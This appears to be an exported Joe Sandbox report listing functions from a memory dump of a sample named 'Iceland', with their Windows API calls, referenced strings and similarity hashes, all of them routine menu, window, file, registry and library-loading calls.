Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 69170c585bd3c6aef4dcdff98a521f3e140984e16b8ad36cf76d72be23e42566
Instruction ID: 2d90035fcf313531e646ccbfab7c6ace5a0f98ea92215a6b2f45b9f72e657c04
Opcode Fuzzy Hash: 69170c585bd3c6aef4dcdff98a521f3e140984e16b8ad36cf76d72be23e42566
Instruction Fuzzy Hash: B2419272604204DFDB16CFA4C884A9ABBB9EF48314F18C0A9AD0ADF345D7B4DD44CBA0

Function 009A4818 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009A48D1
IsMenu.USER32(?), ref: 009A48E6
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 009A492E
DrawMenuBar.USER32 ref: 009A4941

Strings

0, xrefs: 009A4825

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert
String ID: 0
API String ID: 3076010158-4108050209
Opcode ID: bd6db322083cb33b9d65a88c6af7f8d48a0b7403ce1cf98dec5f12dc84a91672
Instruction ID: 64576a512343d0201c72e82abecb4fc61d1323de79232b93a7ae6552e351fbf7
Opcode Fuzzy Hash: bd6db322083cb33b9d65a88c6af7f8d48a0b7403ce1cf98dec5f12dc84a91672
Instruction Fuzzy Hash: A7418874A01209EFDB10CF55D884AABBBB9FF86324F044029F9469B250C774ED50DBA0

Function 0097272F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0091B329: _wcslen.LIBCMT ref: 0091B333

Part of subcall function 009745FD: GetClassNameW.USER32(?,?,000000FF), ref: 00974620

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 009727B3
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 009727C6
SendMessageW.USER32(?,00000189,?,00000000), ref: 009727F6

Part of subcall function 00918577: _wcslen.LIBCMT ref: 0091858A

Strings

ComboBox, xrefs: 0097273D
ListBox, xrefs: 00972772

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: MessageSend$_wcslen$ClassName
String ID: ComboBox$ListBox
API String ID: 2081771294-1403004172
Opcode ID: 71168eb38a0c7e3be4b21160bae5cac68ef33675fbf376471c693feef3cd5d84
Instruction ID: b69cb2faafe5ca18470e29f2e6ed301718c445e5c83e59ae67731f32199084d5
Opcode Fuzzy Hash: 71168eb38a0c7e3be4b21160bae5cac68ef33675fbf376471c693feef3cd5d84
Instruction Fuzzy Hash: DE2129B6A40108BFDB09ABA4DC46EFF77B9DFC53A0F108129F426971E1CB39494A9650

Function 009A39B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 009A3A29
LoadLibraryW.KERNEL32(?), ref: 009A3A30
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 009A3A45
DestroyWindow.USER32(?), ref: 009A3A4D

Strings

SysAnimate32, xrefs: 009A3A04

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: MessageSend$DestroyLibraryLoadWindow
String ID: SysAnimate32
API String ID: 3529120543-1011021900
Opcode ID: e4368f98a6ac281e75eae9300bc403f09886b857084c24fb071f9023b476eb3e
Instruction ID: 60398ddf9505bf41937f424b335b1a7b87896e2e48d554a22f84fc1d159e8e78
Opcode Fuzzy Hash: e4368f98a6ac281e75eae9300bc403f09886b857084c24fb071f9023b476eb3e
Instruction Fuzzy Hash: A521AE71604219AFEF108F64DC80FBB77ADEF8A368F109218FA91961D0C771CD40A7A0

Function 009350DD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0093508E,?,?,0093502E,?,009D98D8,0000000C,00935185,?,00000002), ref: 009350FD
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00935110
FreeLibrary.KERNEL32(00000000,?,?,?,0093508E,?,?,0093502E,?,009D98D8,0000000C,00935185,?,00000002,00000000), ref: 00935133

Strings

mscoree.dll, xrefs: 009350F6
CorExitProcess, xrefs: 00935108

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 1f0356c70be5c517ee60d784dbda59d1293825e68c3a05d015db294555796c2d
Instruction ID: 497aee6e96ad92aad5a06c6d4642ae85a3404c632c8287204d06e1ad6e02b688
Opcode Fuzzy Hash: 1f0356c70be5c517ee60d784dbda59d1293825e68c3a05d015db294555796c2d
Instruction Fuzzy Hash: DBF06230A59208BFDB159F94DC59BEDBFB8EF49756F410064F806A2160DF749E80DAD0

Function 00916607 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00955657,?,?,009162FA,?,00000001,?,?,00000000), ref: 00916610
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00916622
FreeLibrary.KERNEL32(00000000,?,?,00955657,?,?,009162FA,?,00000001,?,?,00000000), ref: 00916635

Strings

Wow64RevertWow64FsRedirection, xrefs: 0091661C
kernel32.dll, xrefs: 00916609

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: fa2f1b8c65ee185c8bdcc3c3ec0b10283a719e4762e0f3abef765fab70c2df58
Instruction ID: 3396d9fecbab057b21a2929efb79daf1cd0e0c77c9c9bca2bc63aeb4d0d3fb83
Opcode Fuzzy Hash: fa2f1b8c65ee185c8bdcc3c3ec0b10283a719e4762e0f3abef765fab70c2df58
Instruction Fuzzy Hash: 26D05B35B2B53957523627257C189CF7B19DED3FA13050119F806A6524CF60CD41D5D8

Function 00983306 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 009835C4
DeleteFileW.KERNEL32(?), ref: 00983646
CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0098365C
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0098366D
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0098367F

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: 21b1a808a63564d1a96acc73a01827bc636d4701151069388f528b365122ce02
Instruction ID: 1b20690fa40287e1c49f0faa8573d48402ab7889b6022244cdf8719719afdaf8
Opcode Fuzzy Hash: 21b1a808a63564d1a96acc73a01827bc636d4701151069388f528b365122ce02
Instruction Fuzzy Hash: D1B13D72E01119ABDF11EBA4CC85FDEBB7DEF89714F0080A6F509A7251EA349A448F61

Function 0099ADE7 Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 0099AE87
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0099AE95
GetProcessIoCounters.KERNEL32(00000000,?), ref: 0099AEC8
CloseHandle.KERNEL32(?), ref: 0099B09D

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: 0ebcb67abc33f2bc42f173fbcf03e63a1b2a4be6d40af1936bbca9f0d75b0c75
Instruction ID: 213071b7da5732ffb6427376fc7f195072fe9538083eed16588811aa0ff67651
Opcode Fuzzy Hash: 0ebcb67abc33f2bc42f173fbcf03e63a1b2a4be6d40af1936bbca9f0d75b0c75
Instruction Fuzzy Hash: 6FA1A271A043019FE720DF28D886F2AB7E5AF94724F54885DF9999B2D2DB71EC40CB81

Function 0099C429 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0091B329: _wcslen.LIBCMT ref: 0091B333

Part of subcall function 0099D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0099C10E,?,?), ref: 0099D415
Part of subcall function 0099D3F8: _wcslen.LIBCMT ref: 0099D451
Part of subcall function 0099D3F8: _wcslen.LIBCMT ref: 0099D4C8
Part of subcall function 0099D3F8: _wcslen.LIBCMT ref: 0099D4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0099C505
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0099C560
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0099C5C3
RegCloseKey.ADVAPI32(?,?), ref: 0099C606
RegCloseKey.ADVAPI32(00000000), ref: 0099C613

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 826366716-0
Opcode ID: 5e7f0ae93ec77f700c398c9cd8f788d1c9a4eea897fb9ffe22382f9a9466004a
Instruction ID: 801b493491afecb4491fdb1b475165f97d9ebe5f65f8631c555dbfc9e24c1fc4
Opcode Fuzzy Hash: 5e7f0ae93ec77f700c398c9cd8f788d1c9a4eea897fb9ffe22382f9a9466004a
Instruction Fuzzy Hash: 40619371208245AFD714DF18C891F6ABBE9FF84308F54855CF49A4B292DB31ED46CB92

Function 0097ED12 Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0097E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0097D7CD,?), ref: 0097E714

Part of subcall function 0097E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0097D7CD,?), ref: 0097E72D

Part of subcall function 0097EAB0: GetFileAttributesW.KERNEL32(?,0097D840), ref: 0097EAB1

lstrcmpiW.KERNEL32(?,?), ref: 0097ED8A
MoveFileW.KERNEL32(?,?), ref: 0097EDC3
_wcslen.LIBCMT ref: 0097EF02
_wcslen.LIBCMT ref: 0097EF1A
SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0097EF67

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
String ID:
API String ID: 3183298772-0
Opcode ID: 1e2da9e3b744d4b313bbf4b2b5819e6add08dd2cef7b719bf9f4076012c7a8d4
Instruction ID: 4d01ee51065cb52975bcb2afbf8ac0c484ca5bd4b0784310ab9c3c72c99672c6
Opcode Fuzzy Hash: 1e2da9e3b744d4b313bbf4b2b5819e6add08dd2cef7b719bf9f4076012c7a8d4
Instruction Fuzzy Hash: 3A5164B25083459BC724EB54DC91ADBB3ECEFC9340F40492EF589D3191EF71A6888B56

Function 00979517 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00979534
VariantClear.OLEAUT32 ref: 009795A5
VariantClear.OLEAUT32 ref: 00979604
VariantClear.OLEAUT32(?), ref: 00979677
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 009796A2

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: 61e586b47d1f72aa26be16494f5d3b7fd03ee0caa3250b10ac20290798c59925
Instruction ID: bf8d4081dadf4aab34a95f146e6994caf754276d4102d257d4b694ef8a5ada43
Opcode Fuzzy Hash: 61e586b47d1f72aa26be16494f5d3b7fd03ee0caa3250b10ac20290798c59925
Instruction Fuzzy Hash: 075129B5A00619EFCB14CF58C884AAAB7F9FF89314B158559E90ADB350E734E911CF90

Function 00989540 Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 009895F3
GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 0098961F
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00989677
WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0098969C
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 009896A4

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: 17619d1aff36d034ef2321100d4180b2fe42675b6a796de17c41f9a51a3e5224
Instruction ID: d54b3dcedd3c336b55632ccf6f9b25f7b4d354a880cbf2f7e75a5cb4f5d9f49e
Opcode Fuzzy Hash: 17619d1aff36d034ef2321100d4180b2fe42675b6a796de17c41f9a51a3e5224
Instruction Fuzzy Hash: 15513035A002199FCB05EF55C885AAEBBF5FF89314F088058E8596B361DB35ED41DF90

Function 00999941 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,?), ref: 0099999D
GetProcAddress.KERNEL32(00000000,?), ref: 00999A2D
GetProcAddress.KERNEL32(00000000,00000000), ref: 00999A49
GetProcAddress.KERNEL32(00000000,?), ref: 00999A8F
FreeLibrary.KERNEL32(00000000), ref: 00999AAF

Part of subcall function 0092F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00981A02,?,7529E610), ref: 0092F9F1
Part of subcall function 0092F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00970354,00000000,00000000,?,?,00981A02,?,7529E610,?,00970354), ref: 0092FA18

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
String ID:
API String ID: 666041331-0
Opcode ID: b98c6ce6e8fca1857ad78e82e33f68dad4ec4cb476adf079ce176d387c3c4137
Instruction ID: 7c6d75a84abfe781f852f5153c01a0e0312ced14c69f2b0f13c803a58f885f28
Opcode Fuzzy Hash: b98c6ce6e8fca1857ad78e82e33f68dad4ec4cb476adf079ce176d387c3c4137
Instruction Fuzzy Hash: A6515C35605209DFCB05DF6CC4859ADBBF5FF49314B1880A8E80AAB762D731ED85CB91

Function 009A75AE Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(00000002,000000F0,?), ref: 009A766B
SetWindowLongW.USER32(?,000000EC,?), ref: 009A7682
SendMessageW.USER32(00000002,00001036,00000000,?), ref: 009A76AB
ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0098B5BE,00000000,00000000), ref: 009A76D0
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 009A76FF

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Window$Long$MessageSendShow
String ID:
API String ID: 3688381893-0
Opcode ID: 7e6e4683966ac2a3246f5eccfa9626d0cbfc6ec883352ef9fd03be2913a8b289
Instruction ID: 90f1bc66b3db44f1d6fbcaed3dcf8c86a853a5e61cbce64d54169f807b7155f9
Opcode Fuzzy Hash: 7e6e4683966ac2a3246f5eccfa9626d0cbfc6ec883352ef9fd03be2913a8b289
Instruction Fuzzy Hash: 6241E375A08504AFC7288FACCC4AFA9BB69EB47350F150224F815A72E0C770ED00D6D1

Function 009423C1 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00942433
_free.LIBCMT ref: 00942453

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: e6a719b53a084e150ad7f1b6caec943ad4dbab5b51158b5f10098d22451bf5f2
Instruction ID: 701c047914d6226fe468500ae250b435e469f0f4fb5e031d8ac3c8569a94db7e
Opcode Fuzzy Hash: e6a719b53a084e150ad7f1b6caec943ad4dbab5b51158b5f10098d22451bf5f2
Instruction Fuzzy Hash: 5241CF32A002009FCB20DF78C881E69B7E5FF89314F5545A9F515EB395DA31AD01DB81

Function 009119CD Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 009119E1
ScreenToClient.USER32(00000000,?), ref: 009119FE
GetAsyncKeyState.USER32(00000001), ref: 00911A23
GetAsyncKeyState.USER32(00000002), ref: 00911A3D

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 8119b64fe96d4e522bee6817296fd19292689a21d6b2ebb22c4c8565537df770
Instruction ID: 14fbf28f95c736e276880eed31369d04e3a7163d007433a6d3f6320c33d399c9
Opcode Fuzzy Hash: 8119b64fe96d4e522bee6817296fd19292689a21d6b2ebb22c4c8565537df770
Instruction Fuzzy Hash: 70418171A0850AFFDF05DF65C844BEEBB74FF05365F20821AE929A2290C7346A94DB91

Function 009842B9 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 00984310
TranslateAcceleratorW.USER32(?,00000000,?), ref: 00984367
TranslateMessage.USER32(?), ref: 00984390
DispatchMessageW.USER32(?), ref: 0098439A
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 009843AB

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

